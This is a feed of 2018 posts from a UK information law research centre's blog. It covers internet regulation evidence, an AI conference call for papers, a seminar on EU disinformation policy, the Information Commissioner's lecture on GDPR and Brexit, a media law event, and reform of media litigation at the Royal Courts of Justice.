Information Law & Policy Centre Blog

Subscribe to Information Law & Policy Centre Blog feed
Information law and policy research at the Institute of Advanced Legal Studies
Updated: 29 min 11 sec ago

“The Internet: To Regulate or Not To Regulate” – ILPC written evidence

Tue, 12/06/2018 - 16:24

The ILPC have submitted a piece of written evidence in response to the recent call for evidence on ‘The Internet: To Regulate or Not to Regulate’ from the House of Lords Select Committee on Communications.

The written evidence outlines four key issues of internet regulation: the protection of human rights, the protection of freedom of expression, the use of deceased’s data and the role of the UK as a world leader in internet regulation.

The publication is available to read here.

 

ILPC Annual Conference 2018 Call for Papers

Wed, 06/06/2018 - 14:59

CALL FOR PAPERS 

Transforming Cities with Artificial Intelligence: Law, Policy, and Ethics

We are pleased to announce this call for papers for the Information Law and Policy Centre’s Annual Conference on 23 November 2018 at IALS in London, this year supported by Bloomsbury’s Communications Law journal. You can read about our previous annual events here.

We are looking for high quality and focused contributions that consider information law and policy within the context of improving the governance of the public interest within cities through the use of AI-based systems. Whether based on doctrinal analysis, or empirical research, papers should offer an original perspective on the implications posed by the use of algorithms and data-driven systems for improving the effectiveness of the public sector whilst also ensuring that such processes are governed by frameworks that are accountable, trustworthy, and proportionate in a democratic society.

Topics of particular interest in 2018 include:

  • Explainability and transparency of algorithms
  • Smart cities
  • Data privacy and ethics
  • Internet of Things
  • Cyber security
  • Open Data and Data Sharing
  • Public-private partnerships
  • AI and Digital education
  • The EU General Data Protection Regulation

 

The conference will take place on Friday 23rd November 2018 and will include the Information Law and Policy Centre’s Annual Lecture and an evening reception.

The ILPC is delighted to announce that Baroness Onora O’Neill, a leading philosopher in politics, justice, and ethics, who is also a Crossbench Member of the House of Lords and Associate Fellow of the University of Cambridge Leverhulme Centre for the Future of Intelligence (CFI) will deliver this year’s Annual Lecture.

Attendance will be free of charge thanks to the support of the IALS and our sponsors, although registration is required as places are limited. Registration to the Annual Conference is available here.

The best papers will be featured in a special issue of Bloomsbury’s Communications Law journal, following a peer-review process. Those giving papers will be invited to submit full draft papers to the journal by 1st November 2018 for consideration by the journal’s editorial team.

How to apply:

Please send an abstract of between 250-300 words and some brief biographical information to Eliza Boudier, Fellowships and Administrative Officer, IALS: eliza.boudier@sas.ac.uk by Friday 13th July 2018 (5pm, BST).

Abstracts will be considered by the Information Law and Policy Centre’s academic staff and advisors, and the Communications Law journal editorial team.

About the Information Law and Policy Centre at the IALS:

The Information Law and Policy Centre (ILPC) produces, promotes, and facilitates research about the law and policy of information and data, and the ways in which law both restricts and enables the sharing, and dissemination, of different types of information.

The ILPC is part of the Institute of Advanced Legal Studies (IALS), which was founded in 1947. It was conceived, and is funded, as a national academic institution, attached to the University of London, serving all universities through its national legal research library. Its function is to promote, facilitate, and disseminate the results of advanced study and research in the discipline of law, for the benefit of persons and institutions in the UK and abroad.

About Communications Law (Journal of Computer, Media and Telecommunications Law):

Communications Law is a well-respected quarterly journal published by Bloomsbury Professional covering the broad spectrum of legal issues arising in the telecoms, IT, and media industries. Each issue brings you a wide range of opinion, discussion, and analysis from the field of communications law. Dr Paul Wragg, Associate Professor of Law at the University of Leeds, is the journal’s Editor in Chief.

ILPC Seminar: EU Report on Fake News and Online Disinformation, 30th April 2018

Wed, 09/05/2018 - 12:36

 

The term “fake news” has become a prominent nomenclature in public discourse. Indeed, the idea of “fake news” has brought to the fore a number of key concerns of modern global society, including if and how social media platforms should be regulated, and more critically, the potentially subversive role of online disinformation (and its spread on such platforms) to undermine democracy and the work of democratic institutions.

 

In response to the growing concerns over “fake news” and online disinformation, the European Union established an independent High Level Expert Group in early 2018 to establish policy recommendations to counter online disinformation. In March 2018, the HLEG published a report entitled ‘A Multidimensional Approach to Disinformation’ which sets out a series of short and longer term responses and actions for various stakeholders, including media practitioners and policymakers, to consider in formulating frameworks to effectively addressing these issues. The report recognises that online disinformation is both a complex and multifaceted issue, but is also a symptom of the broader social move toward globalised digitalism.

 

The Information Law and Policy Centre (ILPC) at the Institute for Advanced Legal Studies, University of London, convened a seminar at the end of April to discuss the report of the HLEG and the phenomenon of “fake news”. The seminar forms part of the ILPC’s public seminar series where contemporary issues regarding various aspects of information law and policy are discussed and deliberated with key stakeholders and experts in the field. Held on the evening of the 30th April 2018, the seminar consisted of an expert panel of discussants from both academia and the media.

 

Chaired by ILPC Director, Dr Nóra Ni Loideain, the panel included Professor Rasmus Kleis Nielsen, Professor of Political Communication at the University of Oxford and Director of Research at the Reuters Institute for the Study of Journalism and member of the HLEG, Dr Dimitris Xenos, Lecturer in Law at the University of Suffolk, Matthew Rogerson, Head of Public Policy at Guardian Media Group, and Martin Rosenbaum, Executive Producer, BBC Political Programmes.

 

After an introduction and overview of the report by the Chair, Professor Nielsen (speaking in his personal capacity) began the panel discussion by noting that “fake news” is part of a broader crisis of confidence between the public, press and democratic institutions. Professor Nielsen cautioned against the use of the term “fake news”, highlighting that it is dangerous and misleading, having been sensationalised for political use. Stressing that the HLEG has taken deliberate steps to quell the further populism of the term by not using it in reports and policy documents, he also pointed out that significant steps to redress the issue cannot take place until we have a deeper understanding of just how widespread the problem is or is not. That being said, Professor Nielsen emphasised that in addressing such issues, we must start from the principles we seek to protect, and particularly, freedom of expression and open democracy.

 

Accordingly, Professor Nielsen set out what he saw to be the six key recommendations from the HLEG’s report, noting that these recommendations come as a package to be realised and implemented together.

  • Abandon the term “fake news”;
  • Set aside funding for independent research in order to develop a better understanding of the scope and nature of the issue, noting too that little is known about the issue outside of the West and Global North countries;
  • Call for platform companies to share more data with fact checkers, albeit privacy complaint;
  • Call for public authorities at all level to share machine readable data to better enable professional journalists and fact-checkers;
  • Invest in media literacy at all levels of the population; and
  • Develop collaborative approaches between stakeholders.

 

 

Our second discussant, Dr Xenos, offered a light critique of the HLEG’s report. He agreed with the HLEG group’s focus on ‘disinformation’ relating to materials and communications that can cause ‘public harm’, and its contextual targets involving parliamentary elections and important ‘sectors, such as health, science, finance’, etc. He pointed out that as the institutions of powers (such the EU’s organs) are very often the original sources of such information that is subsequently treated by various media organisations and communicative platforms, the same standards and safeguards should apply to the communications and materials that are produced and published by the institutions. Dr Xenos referred to his contribution and the recent reports of the EU Ombudsman, involving the EU Commission, the EU Council and their very wide range of experts which highlight serious deficiencies in decision and policy-making, undermining the basic democratic safeguards which the HLEG’s report targets, such as transparency, accountability, avoidance of conflicts of interests, and access to relevant information. In this respect, Dr Xenos argues that the proposal for a fact-checking system of media communications covering decisions and policies of the institutions of power is unrealistic when such a system and safeguards do not apply to the original communications, materials and decisions of these institutions that the media may (if and when) subsequently cover. He emphasised the need for an independent academic insight that can offer analysis of events ex ante, in contrast to the traditional ex post analysis of journalism. However, Dr Xenos also said that the role of academics is undermined if appropriate research focus is lacking or there is a conflict of interest – an issue, he believes, concerns also those media organisations and platforms controlled by private corporations. In support of his claims, he referred to a recent study and its subsequent coverage by both the UK and US media. He welcomed the HLEG’ suggestions for access and analysis of platforms’ data and algorithm accountability in the dissemination of information.

 

Responding to Dr Xenos, Dr Ni Loideain noted that the report consistently emphasised the need for evidence-based decision- and policy-making.

 

Following from Dr Xenos’ remarks, Matt Rogerson from the Guardian Media Group emphasised the critical role online disinformation can play in determining the outcome of elections. Matt noted that current politics are marginal, with over a hundred constituencies won or lost with a swing vote of under 10%, which Facebook, for example, can greatly influence, given the high numbers of people who gain their news updates only from this source. Matt noted, too, how in the wake of the Cambridge Analytica scandal, tech companies are becoming increasingly hesitant to be open about their policies and activities. Matt further highlighted that the knowledge and understanding of citizens of the various news agencies and news brands varies, pointing to a study which demonstrated how citizens had a greater trust for the news items offered in certain broadsheet newspapers as opposed to particular tabloid presses.

 

Recognising, therefore, that there is strong media diversity and pluralism of news brands at present, Matt spoke of how this must be preserved and protected. One important issue, Matt noted, was the need for stronger visual queues on platforms such as Facebook, so users could readily distinguish between the branding of the Guardian news items, in comparison to other less-trusted news sources. Matt also raised concerns about the impact of programmatic digital advertising, which effectively decouples brand advertising from the context in which it is seen via online platforms, reducing the accountability of the advertiser as a result.

 

In terms of how to create trust between news organisations and the wider public, Matt drew our attention to the importance of diversity within media houses and social media platforms. Highlighting the lack of gender and ethnic diversity within the tech industry, as well as the related monopoly of Silicon Valley companies over the industry as a whole, Matt noted how the effect of this meant that there was little competition between platforms to raise standards and do the right thing by society. Matt recommended revisiting competition regulation to drive competition and diversity.

 

Martin Rosenbaum from the BBC and speaking in his personal capacity was the final discussant to offer their response on the report. Martin echoed the sentiments of Matt and Professor Nielsen in cautioning against downplaying the issue of disinformation and the effect it can have on society. Martin made note of the fact that disinformation can occur in various forms, including users sharing information despite not knowing or caring whether it is true or otherwise. Moreover, Martin emphasised how disinformation more broadly can foster a lack of trust in trusted news agencies and public institutions by generating, as Professor Nielsen spoke of too, a general crisis of truth.

 

Martin additionally mentioned how the ready consumption and splurge of news users receive on Facebook represents a divorce between the source of the information (for example, the BBC) and the way in which it is distributed and reaches the consumer. Martin explained how this works to undermine the trustworthy-ness of certain kinds of media and information.

 

In speaking of mechanisms through which to counter disinformation, Martin noted the BBC’s code on journalism that is accurate, fair and impartial, which underlies its position as one of the most trustworthy news sources globally. He further noted how the BBC has put in place various accountability mechanisms to handle complaints effectively. Martin additionally spoke of the need for media literacy and involving younger generations in news-making, reporting, and spotting “fake news”.

 

Responding to the claims made earlier by Dr Xenos, Martin assuaged that specialist journalists are most often best placed to fact-check news stories. And lastly, Martin also pointed out how chat apps were also complicit in the dissemination of “fake news” items, and that these platforms were much harder to regulate and monitor in terms of the content they handle.

 

Following from Martin’s contribution, the discussion opened up and various questions were posed to the panel regarding the scope and definition of disinformation and how this issue overlaps the fundamental principle of freedom of expression. There was a broad consensus to steer away from unnecessary government regulation that may impact upon free speech. Other issues raised included the tension between the call for open data and data sharing and the coming into effect of the GDRP this month.

Dr Rachel Adams, ILPC Early Career Researcher

Money, law and courage: the varied roles of the UK Information Commissioner

Wed, 18/04/2018 - 11:49

This post is re-posted from the ICO’s website with kind permission. Original web entry available here

Original script may differ from delivered version

Elizabeth Denham delivered the CRISP (Centre for Research into Information, Surveillance and Privacy) annual lecture 2018 at the University of Edinburgh on 14 March.

She spoke about the many roles she must play as UK Information Commissioner and set out the challenges and opportunities ahead. Introduction

Many thanks for the invitation to speak today. I have a connection with CRISP and William Webster, Kirstie Ball and Charles Raab that predates my time in the UK – British Columbia OIPC is a partner in Big Data Surveillance Project with David Lyon and others in Canada. I have long been aware of the importance of the CRISP doctoral training school.

One of the wonderful aspects of privacy and data protection is the extremely rich and interdisciplinary scholarly research community.

Data Protection raises questions of law, politics, sociology, computer science, communications studies, business and management, psychology, urban studies, geography, and so many other areas of scholarship.

For all the regulatory and legal challenges, privacy and data protection continue to raise fascinating intellectual issues.

CRISP is a wonderful model of interdisciplinary research and training for young researchers.

I am very glad to have received the support of the broad and vibrant academic community involved in research on privacy and surveillance since taking up this job.

I am also proud to have launched a new program to fund independent research and help consolidate the network of privacy researchers in the UK.

I am hopeful that this will continue for many years.

Money, law, courage

The title, Money, Law and Courage – signifies, of course, that the contemporary data protection authority (DPA), of which the ICO is the largest in the world in terms of personnel and budget, cannot do its work without a clear legislative framework, the necessary technical and financial resources and the courage to do our jobs well. My office is responsible for the effective enforcement of no fewer than eleven statutes and regulations.

They say: “Money makes the world go around . . .”

Well, we have a budget of £24 million pounds, following the introduction of the new funding model this will be £34m in 2018/19. We’ve been busy over the last year recruiting more staff and currently have a headcount of around 500.

We expect staffing numbers to continue to increase, passing 600 by 2019 increasing to an approximate FTE of 650 during 19/20.

We will be assessing demand as the GDPR goes live and beyond, adjusting our plans accordingly. To give you a sense of we are fixed now, we’ve got around 200 case-workers working on issues raised by the public, a 60-strong enforcement department taking forward our investigations and a similar number charged with developing our information rights policies and engaging with the stakeholders and organisations that need to implement them.

Coming from an office of under 40 in British Columbia, the scale of the management tasks is obviously far more complex and challenging.

Expectations

I had – I have – Great Expectations for this job.

But there’s one aspect of the job that I did not expect, and it stems from the very governance structure of the ICO.

My job combines the role of Commissioner, which has a variety of regulatory and quasi-judicial functions, with that of a CEO. It is based on the “Corporation Sole” Model.

That’s highly unusual for a large regulatory body like the ICO.

The implications of this model are that I perform a wide range of management functions in my capacity as the ICO’s CEO.

I would say that as well as my regulatory role, I must also work alongside my excellent staff on administrative duties involving organisation, finance, human resources, and negotiations with the unions.

Much activity of late has been about recruitment and retention issues. I am pleased to report that the Treasury has given me pay flexibility to address the gap in wages when compared to the external market.

Everyone is looking for data protection expertise.

I am also looking at new ways to bring in talent – through secondments from the private and government sectors, and through technology fellowships for post-doctoral experts. 

Toolbox

It’s not just about the money, it’s also about the resources. And I have many tools in the toolbox. 20 years ago, the toolbox was not global.

Now there is a common recognition that all DPAs need to make creative use of all the tools in the toolbox.

And as in a toolbox, each tool (the hammer, the drill, the screwdriver, the chisel) is suited to a different purpose.

But most of these tools can be used separately, and not in conjunction with another. Throw away the screwdriver or the drill, and the hammer still remains and is still capable of driving in the nail.

At the same time, it cannot drill the hole, or screw in the screw – assuming, of course, that the user can tell the difference.

For the person with the hammer, everything can tend to look like a nail, right?

The tools in the privacy toolbox, however, are designed to be used in conjunction with one another. They do form an integrated package, all of which are now necessary and none sufficient on their own.

Of course the tools are all for nothing if the Commissioner and her team don’t have a good plan for what we are building and why.

The Law

So now to the law. This global repertoire of instruments is reflected in the General Data Protection Regulation (GDPR), that will apply in the UK from May: privacy by default and design; codes of practice; privacy seals; Data Protection Impact Assessments (DPIA); data protection officers; accountability mechanisms for good privacy management.

The Europeans have made vigorous efforts to learn from abroad and to embrace policy instruments that were pioneered in other countries, such as Canada, and to incorporate them into the GDPR.

Positive results in data protection are not just attributable to decisions from the top.

They are “co-produced” by a widespread network of actors (regulators, businesses, consumer organisations, media, researchers, and individuals).

I see the ICO as the facilitator of this network, a convener as much as the regulator.

My varied roles

Over ten years ago, Charles Raab and Colin Bennett published The Governance of Privacy: Policy Instruments in Global Perspective1.

In that book, they defined the contemporary roles of the DPA as: ombudspersons, auditors, consultants, educators, policy advisers, negotiators, enforcers, and international ambassadors.

Different authorities played these roles in different ways and with shifting emphasis over time. I, and my staff, also play these roles.

Data Protection “Ombudsman”

Any DPA has to be attentive to its main clients – the citizenry who may have concerns and questions about how their personal data is captured and processed.

We all play the classic role of the “ombudsperson.”

Demand for this role is high and increasing. In 2016-17, the ICO received and dealt with over 18000 data protection complaints, 90% of which were resolved within three months of receipt.

This year we will be over the 21,000 mark and next year we expect over 24,000 complaints as people become more aware of their rights.

Prominent concerns include complaints about timely and comprehensive access to personal information, about the use of CCTV, and take-down requests from search engines. We are dealing with a wide range of complaints, most relate to general business, including the financial and insurance sectors, but they also cover the important relationship and services between the state and the citizen, including local and central government, health, policing and education.

Auditor

The auditing role is central, and will become more so under GDPR. That embraces more proactive assessments of organisational accountability and expands our work to the private sector in a way not seen before. But we now also have a more nuanced understanding of what a data protection audit actually entails, and make important distinctions between full-blown audits, risk reviews and advisory audits.

In 2017-18, we delivered 24 full audits providing advice and recommendations, 37 information risk reviews, 18 follow-up audits, and 47 advisory audits to SMEs.

Consultant

We are also consultants and often give advice to organisations that come to us with requests to comment on new products and services.

We are happy to hear of new developments and to give advice about whether new systems are compliant with the law, and about how to minimize risks to privacy. This role too will increase under the GDPR – organisations will be increasingly pressured to get the advice of regulators before systems are developed and services are launched.

They will be expected to implement privacy by design, and by default, and will need advice about how to accomplish those goals.

In this regard, my office is establishing a regulatory “sandbox” that provides beta testing of new initiatives in private and public sectors.

This strategy allows us to keep up with new technological developments, and at the same time ensure that appropriate protections and safeguards are built-in.

This is what the law requires.

The strategy is based on the strong belief that privacy and innovation are not mutually exclusive. New technology is both a risk and an opportunity. The strategy also allows us to boost the technical expertise of our staff.

Educator

I spend a lot of my time in education – both of the general public and of organisations. We have launched a guide to the GDPR, which has had over 3 million hits since publication.

I have given several dozen speeches to organisations over the last two years, and use those as an opportunity to spread the word to key audiences. We are also active in social media, and broadcast podcasts on significant questions. I also write blogs on key issues – including a series of GDPR myth busting blogs.

In April, we will launch a public education campaign, Your Data Matters, to educate the public on their new rights under the law.

The campaign is the ICO’s but we are collaborating with private sector and civil society partners to assist us in disseminating information about the use of personal data in everyday life, complete with real-life scenarios and story-telling content. The aim is to increase the public’s trust and confidence in how organisations use their data. And that’s my priority.

Policy Adviser 

With the GDPR, and Brexit, I have spent a lot of time with parliamentary committees, ministerial staff in giving policy advice about legislative and regulatory change. I spend around 2-3 days a week in London since I took up the position because of heavy parliamentary and Whitehall business. We have opened a London office and formed a parliamentary team.

Negotiator

My staff and I need strong negotiation skills staking out principled positions, but being prepared to compromise. We negotiate with government agencies, and with corporations. We negotiate, for instance, over codes of practice, such as the one currently being developed on direct marketing.. The role of negotiator is critical in an area of law where there are often no clear black and white answers, and few “bright-line” rules.

We are also involved in negotiation with other regulators and oversight agencies. There are many other players in this space – from the NCSC in matters of cyber security, the Surveillance Camera Commissioner to the Childrens’ Commissioners. In fact I met with Bruce Adamson the Children and Young People’s Commissioner Scotland just this morning.

We work hard to develop a framework that allows us to work in a co-ordinated manner in the best interest of UK citizens.

I played all those roles in Canada (in Ottawa and in British Columbia). But they are now played out on a bigger stage, and with far greater implications.

There are two roles I’ve yet to speak about – the enforcer and the international ambassador.

These are far more prominent in my role as UK Information Commissioner than they ever were in Canada. And these are the ones that I would like to discuss in greater detail in the rest of this talk.

Enforcement

My office possesses a greater range of enforcement and sanctioning powers than those in Canada.

As an illustration, companies could find themselves subject to severe penalties for not complying with the GDPR, which states the maximum amounts that companies could be liable to as £17m, or 4% of the organisation’s total annual worldwide turnover in the preceding year, whichever is higher.

We also have powers to suspend or amend processing or transfers.

The enforcement notice can be more intrusive than the fine. These are significant fining and directing powers, and they have to be to be used predictably, consistently and judiciously.

To that end, my office is developing a Regulatory Action Policy to provide greater clarity and focus to our roles.

So, when I look at the contemporary inventory of regulatory tools at my disposal, it is now a long list that operates on a sliding continuum, or hierarchy of regulatory action.

That’s quite a list, right?

We aspire to select the most appropriate regulatory instrument based on a risk assessment of the nature and seriousness of the breach, the sensitivity of the data, the number of individuals affected, the novelty and endurance of the concerns, the larger public interest, and whether other regulatory authorities are already taking action in respect of the matter.

We also reserve the right to take into account the attitude and conduct of the organisation, whether relevant advice has been heeded, and whether accountability measures have been taken to mitigate risk.

Now might be a good time to tell you about our ongoing investigation into the use of personal data by political parties and campaigns. The use of data analytics for political purposes has not been examined by any other DPA.

It is a complex investigation involving over 30 organisations including political parties, data analytics companies, and social media platforms.

We hope to shed light on the mysteries and complexities of the data driven campaign and election. And we hope that our work will be an important contribution to the wider legal and ethical discussions about the use of personal data to mobilize voters.

International

All privacy and data protection commissioners are increasingly international ambassadors for their domestic data protection regimes and approaches.

We advance the interests of our citizens, and also to some extent our businesses, in a variety of regional and international forums.

As UK Information Commissioner, I am now of course on a far more visible international stage then I ever was in Canada.

To help navigate these uncertain international waters, my office has published an international strategy that recognizes the importance of agility in an ever changing world.

As you know, the GDPR will apply in the UK as of May 25th 2018. We have been giving guidance to British businesses on how to comply with the GDPR, on issues such as automated decision-making, profiling, personal data breach notification, and the processing of data on children.

We have also tried to explode some of the unfortunate myths concerning compliance.

As we have a more longstanding experience with some of the instruments in the GDPR, we hope that our practical guidance can have an influence beyond the UK.

At the same time, we have been trying to influence the new Data Protection Bill, which had its Second Reading debate in the Commons last week, and which aims to align UK law with the GDPR.

Overall, I am encouraged that the interests of the government, UK industry and civil society are broadly aligned around the need to apply the provisions of the GDPR within the UK with minimum divergence. The government has prioritised the issue of data protection and data flows in the Brexit negotiations because data underpins the digital economy, trade and criminal justice.

I am striving for what I have called a “holy trinity of outcomes”: uninterrupted data flows to Europe and the rest of the world; high standards of data protection for UK citizens and consumers, wherever their data resides; and legal certainty for business.

Brexit

We intend to play a full role in EU institutions until the UK leaves the EU, we are preparing for the post-Brexit environment in order to ensure that the information rights of UK citizens are not adversely affected.

But several questions remain, and which will be inescapably determined by the final contours of the relationship between the UK and the European trading bloc. There is agreement that there will be a transition period – necessary to untangle a 40-year regulatory regime. During the transition period, to avoid a cliff edge harmful for business and citizens, the intent is that the regulatory regimes – from data protection to aviation, food standards and the environment will be maintained.

When it comes to the arrangements post-Brexit for international transfers, achieving a bespoke agreement on data flows in the commercial and security sectors, or an adequacy finding from the European Commission may be the most elegant ways of ensuring the continued frictionless flow of data between the EU and the UK.

And there is no doubt that having domestic laws that achieve a high standard of data protection, harmonized with those of the EU, will be a significant advantage in a special arrangement.

Should the UK leave the EU without a data deal in place, EU organisations will need to have binding contractual arrangements in place every time they wish to share new information and data with their UK partners.

Even with the GDPR translated into UK law, interpretation of the law is the responsibility of the ICO, and the UK courts.

Our interpretation might be influenced by decisions made through consistency mechanisms within the GDPR and the European Data Protection Board, but there is no guarantee – leading to possible divergences of interpretation and confusion for companies that do business in the UK and the EU.

Perhaps the most significant “unknown” from my point of view is the exact nature of relationship with our DPA colleagues across Europe.

Is the ICO going to have a seat on the European Data Protection Board with voting rights or will we be an observer without voting rights; or not even allowed to have a seat around the table? Is the UK going to be a partner, helping to set policy, or will we have the status of a third country – like Canada or Japan?

And then there is the “onward transfer” problem of how to protect the data of EU citizens exported from UK organisations to other areas of the world, and which will be a critical issue in the determination of adequacy. Will the UK have a mirror agreement, similar to that enjoyed currently by Switzerland? Or will UK businesses have to default to various accountability mechanisms, such as binding corporate rules.

And what, then, of data flows from the UK to the United States? Will there be a separate UK-US Privacy Shield arrangement?

There is uncertainty over the legal arrangements in the transition period and the repercussions of this unprecedented process, but the one certainty is that the European Union will continue to advance the highest standards of protection for the personal data of people in the EU, and the UK shares and has committed to maintain these high standards.

I expect that when it comes to rights such as the right to privacy and data protection, the EU and the UK will continue to pursue common strategies; and I expect to maintain substantial dialogue and work with my EU colleagues. The ICO is the largest DPA in Europe and contributes heavily to the work of the Article 29 Working party. Its influence should, and will, continue to be felt post-Brexit.

Courage

But none of those resources, legal tools and relationships are sufficient, unless the Commissioner has the courage of leadership and inspires teamwork to advance the rights of UK citizens in the face of some strong global, technological and organisational pressures. But courage is not just manifested in enforcement – in using the legal powers of the office to punish and sanction.

It is also a matter of hard work, commitment, perseverance and a skill in knowing what instrument to use, at what time.

Any data protection or privacy Commissioner has to be pragmatic, and be aware of the various policy tools and instruments at his or her disposal. At a superficial level, the job does involve knowing when to use the ‘carrot’ or ‘the stick’. But those choices are now more complex.

So that simple distinction may be misleading – there are now many types of ‘carrot’ and many types of ‘stick’.

At the end of the day, all privacy and data protection commissioners are looking for an ounce of prevention.

That has been generally argued by observers of the work of privacy commissioners, going back to David Flaherty’s 1989 pioneering book, Protecting Privacy in Surveillance Societies2.

Offices like mine, like the ICO are more effective when they can act proactively, and can give general policy guidance to minimize the needs for complaints, and for enforcement actions.

Prevention is better than cure.

But this is a goal that is not easy to realise, when the office is continually expected to respond to the unexpected: the data breach, the high-profile media story, the sudden policy initiative from government, the significant court decision and so on.

We do try to operate an intelligence function that gathers data on the implementation of data protection, surveys companies and monitors practices.

We have a new team that focuses on priority files, and these cases, investigations or audits are run by cross office groups directed by the senior leadership team. We are then able to understand any general patterns and take proactive measures accordingly.

We also work with civil society and consumer groups – and take their complaints about systemic issues.

GDPR will give us more tools for education, for encouraging accountability, for building in privacy by design and by default. Of course, it is essential to keep the legal sanctions in the background, be ready to use them, and make organisations aware that we are ready to use them.

That general conclusion about the importance of the proactive and general policy work, over the more reactive enforcement work, was also true of my work in Canada and BC.

It is just that I now have more money, more staff, more laws, more tools in my toolbox, a larger audience, a brighter media spotlight and a more extensive range of organisations to regulate.

So, I have the resources to do the job and the law to back me up.

I’ll let you be the judge as to whether I and my team have the courage!

References

1 C.J Bennett and C.D Raab, The Governance of Privacy: Policy Instruments in Global Perspective (Cambridge MA: MIT Press, 2006).

2 D.H Flaherty, Protecting Privacy in Surveillance Societies: The Federal Republic of Germany, Sweden, France, Canada and the United States (Chapel Hill: University of North Carolina Press, 1989).

Event: Joining The Circle: capturing the zeitgeist of ‘Big Tech’ companies, social media speech and privacy

Mon, 09/04/2018 - 11:40

Event: Joining The Circle: capturing the zeitgeist of ‘Big Tech’ companies, social media speech and privacy

Professor Robin Barnes (Global Institute of Freedom and Awareness) and Peter Coe (Aston University) have organised a panel session at the Inner Temple, London, on Wednesday 23 May 2018. The session is entitled: ‘Joining The Circle: capturing the zeitgeist of ‘Big Tech’ companies, social media speech and privacy’.

It is based on Dave Egger’s book, The Circle, which tells the story of an all-powerful new media company that seeks to totally monopolize its market place and remake the world in its image. Although fictional, the book captures the zeitgeist surrounding ‘Big Tech’ companies exerting ever-increasing influence over our lives by altering our perceptions and expectations of the media (including citizen journalists), free speech and privacy, and how our personal information is used and protected.

The panel consists of seven experts from academia and practice who are currently engaging with these issues, including: Peter Coe, Professor Barnes; Dr Paul WraggRebecca Moosavian (both University of Leeds), Dr Paul Bernal (University of East Anglia), Dr Laura Scaife (BBC) and Jacob Rowbottom (University of Oxford). Professor Ian Cram (University of Leeds) will open the conference. These experts will present and discuss their thoughts on these issues, and their potential implications, both now and in the future.

This event will be of interest to practising and academic lawyers with expertise in Media Law generally (including free speech, privacy and data protection), journalists and other media professionals, and those engaged in research and teaching relating to journalism and the wider media.

The event is free to attend, and includes lunch and refreshments. Registration will begin at 9.00am and the panel will finish at around 4.00pm. Following the close of the panel session there will be an opportunity to network with the panel members and other delegates.

Delegate places are limited. Therefore, places are available on a first come first served basis. If you would like to attend, please email Peter Coe as soon as possible: p.coe@aston.ac.uk.

 

New approach to media cases at the Royal Courts of Justice is a welcome development

Mon, 09/04/2018 - 11:24

Guest post by Dr Judith Townend.

This is an edited version of an article which first appeared in Communications Law journal, volume 23, issue 1 (Bloomsbury Professional) and PA Media Lawyer.

In 2012 Mr Justice Tugendhat, ahead of his retirement in 2014, made a plea for more media specialist barristers and solicitors to consider a judicial role: “As the recruiting posters put it: Your country needs you.”

#
He emphasised the particular burden of freedom of expression cases, which require judges, for example, to consider the rights of third parties, “even if those third parties choose not to attend court” and to provide reasons for the granting of injunctions at very short notice.

Without expert knowledge of the applicable law, this is no easy task. Fortunately, media law cases have not fallen apart with the respective retirements of Sir Michael Tugendhat and Sir David Eady, and recent specialists to join the High Court include Mr Justice Warby in 2014, and Mr Justice Nicklin in 2017 – both formerly of 5RB chambers.

The arrival of Mr Justice Warby, who was given the newly created role of Judge in charge of the Media and Communications List, has provided a welcome opportunity to propose changes to the procedure of media litigation in the Queen’s Bench Division, where the majority of English defamation and privacy claims are heard.

Since taking on responsibility for the cases involving one or more of the main media torts – including defamation, misuse of private information and breach of duty under the Data Protection 1998 – Mr Justice Warby has spoken about his hopes and plans for the list, and also conducted a consultation among those who litigate in the area, as well as other interested parties.

The consultation considered the adequacy of Civil Procedure Rules and Practice Directions; the adequacy of the regime for monitoring statistics on privacy injunctions; and support for the creation of a new committee.

As a socio-legal researcher rather than legal practitioner, my interest was piqued by the latter two questions.

For some time, I have been concerned that efforts by the Judiciary and the Ministry of Justice to collect and publish anonymised privacy injunction data have been insufficient, and also that the availability of information about media cases could be improved more generally.

My own efforts to access case files and records in 2011-13, to update research conducted by Eric Barendt and others in the mid 1990s, and to interrogate assertions of defamation’s “chilling effect”, proved largely unsuccessful and I was astonished how rudimentary and paper-based internal systems at the Royal Courts of Justice appeared to be.

Although public observers are entitled to access certain documents – such as claim forms – the cost and difficulty in locating claim numbers prohibits any kind of useful bulk research which would allow more sophisticated qualitative and quantitative analysis of media litigation.

I jumped, therefore, at the opportunity of the consultation to raise my concerns about the injunctions data, and to support the creation of a new user group committee.

My submission, with Paul Magrath and Julie Doughty, on behalf of the Transparency Project charity, made suggestions for revising the injunctions data collection process, including the introduction of an audit procedure to check information was being recorded systematically and accurately.

Following the consultation, Mr Justice Warby held a large meeting at the Royal Courts of Justice for all respondents and other interested parties at which he shared a table of proposals from the consultation, provisionally ranked as “most feasible”, “more difficult” and “most difficult”.

The last category also included proposals which would require primary legislation, which would be a matter for Parliament rather than the Judiciary.

I was pleased that our initial proposals on the transparency of injunctions data have been deemed practical and feasible in the first instance.

Also considered achievable are some of the proposals related to case management and listings, updating the pre-action protocol (PAP), the Queen’s Bench Guide, and civil practice directions in light of developments in privacy, data protection and defamation litigation and press regulation (not least to reflect the Defamation Act 2013).

This meeting also established the creation of a new Media and Communications List User Group (MACLUG) to which a range of representatives have been appointed.

The group comprises members of the Bar and private practice solicitors (including both claimant and defendant specialists), in-house counsel, clerks, and a costs practitioner.
Additionally, I have joined as a representative of public interest groups – i.e. those engaged in academic research and third sector work. The new committee met for the first time at the end of 2017, and members have formed smaller working groups to take forward the “feasible” proposals, which will be discussed with our respective constituencies in due course, and where relevant, eventually proposed to the Civil Procedure Rule Committee to consider.

In a speech to the Annual Conference of the Media Law Resource Center in September last year Mr Justice Warby identified his overall aims for the “big picture” and landscape of media litigation: to resolve disputes fairly, promptly, and at reasonable cost.

All of which were “easier said than done”, in his words. Quite so. But it is right that it should be attempted, and with judicial input where appropriate.

Mr Justice Warby’s efforts to date are to be applauded, and in particular, his open approach in addressing some of the flaws and inconsistencies of current practice, and evaluating structural and systemic issues.

That said, a committee formed by the judiciary is constrained in its remit, quite rightly. The consideration of changes to primary legislation should fall to Parliament.

It is therefore important that media law practitioners and other stakeholders should also work with the Ministry of Justice and HM Courts and Tribunals Service to inform ongoing work on courts modernisation, and push for wider consultation and involvement in reforms. A further challenge is to persuade government and parliamentarians to take on any issues requiring changes to legislation.

Part I of the Leveson Inquiry addressing, in part, the relationship between media proprietors, editors and politicians showed that the process of consultation on public policy affecting the news media has been subject to undue influence by certain private interests, and insufficiently transparent.

